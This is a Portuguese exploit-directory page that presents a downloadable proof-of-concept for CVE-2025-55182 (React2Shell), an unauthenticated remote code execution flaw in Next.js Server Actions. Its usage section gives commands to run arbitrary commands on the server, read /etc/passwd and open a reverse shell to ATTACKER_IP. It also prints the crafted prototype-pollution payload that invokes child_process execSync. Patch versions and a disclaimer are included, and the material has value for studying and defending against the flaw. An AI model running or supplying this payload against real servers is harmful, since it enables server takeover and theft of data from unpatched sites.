Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/d0cnull/nextjs-cve-2025-55182
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubd0cnull/nextjs-cve-2025-55182

nextjs-CVE-2025-55182

Ver Repositório
há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 / CVE-2025-66478 (React2Shell) - PoC de Execução Remota de Código (RCE) no Next.js

Vulnerabilidade crítica em Server Actions do Next.js que permite Execução Remota de Código sem autenticação via desserialização do React Flight Protocol

Visão Geral

Este repositório contém uma Prova de Conceito (PoC) para a vulnerabilidade crítica de RCE que afeta aplicações Next.js que utilizam Server Actions (React Server Functions).

DetalheInformação
CVECVE-2025-55182 / CVE-2025-66478
GravidadeCrítica (CVSS 10.0)
React AfetadoReact 19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js AfetadoNext.js 15.x, 16.x, 14.3.0-canary.77+
NÃO AfetadoNext.js 14.x estável, 13.x, Pages Router, Edge Runtime
Next.js Corrigido15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7
React Corrigido19.0.1, 19.1.2, 19.2.1
TipoExecução Remota de Código (RCE)
Autenticação NecessáriaNenhuma

Descrição da Vulnerabilidade

A vulnerabilidade existe na forma como o React Flight Protocol desserializa chunks durante o processamento de Server Actions. Um atacante pode explorar prototype pollution via dados de formulário especialmente criados para:

  1. Acessar o construtor Function por meio da travessia da cadeia de protótipos (__proto__)
  2. Executar código JavaScript arbitrário no servidor
  3. Alcançar Execução Remota de Código completa sem autenticação

Isso ocorre antes de qualquer validação da server action, o que a torna explorável em qualquer aplicativo Next.js com Server Actions habilitadas.

Aplicações Afetadas

Qualquer aplicação Next.js é vulnerável se:

  • Utiliza Server Actions (padrão no App Router)
  • Estiver executando Next.js 15.x ou 16.x (ou 14.3.0-canary.77+)
  • Não tiver mitigações específicas implementadas

Uso

Requisitos

root@kitploit:~
pip install requests

Executar a PoC

root@kitploit:~
python3 poc.py <TARGET_URL> "<COMMAND>"

Exemplos

root@kitploit:~
# Test command execution
python3 poc.py http://localhost:3000 "id"

# Read sensitive files
python3 poc.py http://localhost:3000 "cat /etc/passwd"

# Reverse shell (for authorized testing only)
python3 poc.py http://localhost:3000 "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Exemplo de Saída

root@kitploit:~
$ python3 poc.py http://localhost:3000 "whoami"
500
0:{"a":"$@1","f":"","b":"development"}
1:E{"digest":"www-data","message":"NEXT_REDIRECT","stack":[],"env":"Server"}

A saída do comando aparece no campo digest.

Detalhes Técnicos

O exploit utiliza o mecanismo de resolução de chunks do React Flight Protocol:

root@kitploit:~
crafted_chunk = {
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": '{"then": "$B0"}',
    "_response": {
        "_prefix": f"process.mainModule.require('child_process').execSync('{cmd}');",
        "_formData": {
            "get": "$1:constructor:constructor",
        },
    },
}

Cadeia de ataque:

  1. Travessia de protótipo via $1:__proto__:then
  2. Acesso ao construtor Function via $1:constructor:constructor
  3. Injeção de código arbitrário via campo _prefix
  4. O código é executado durante a desserialização (pré-autenticação)

Mitigação

Atualize imediatamente:

root@kitploit:~
npm install next@latest
# or
pnpm update next

Versões corrigidas: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

Nota: Next.js 14.x estável e 13.x NÃO são vulneráveis.

Aviso Legal

⚠️ Esta PoC é apenas para fins educacionais e de testes de segurança autorizados.

O acesso não autorizado a sistemas de computador é ilegal. Use esta ferramenta apenas em sistemas que você possui ou para os quais tenha permissão explícita de teste. Os autores não são responsáveis por qualquer uso indevido.

Créditos

Baseado na pesquisa original de @msanft. Todo o crédito pela descoberta da vulnerabilidade e pela PoC inicial vai para eles.

Referências

  • Pesquisa original CVE-2025-55182
  • Comunicado Oficial de CVE do Next.js
  • Pesquisa da Wiz - Análise React2Shell
  • React Flight Protocol
  • NIST NVD - CVE-2025-55182

Palavras-chave

Next.js RCE, Next.js vulnerability, CVE-2025-55182, CVE-2025-66478, React2Shell, React Server Components exploit, Next.js Server Actions RCE, prototype pollution Next.js, React Flight Protocol vulnerability, Next.js security, Next.js remote code execution, Next.js exploit PoC, Server Actions vulnerability, React RSC RCE

Baixar ferramenta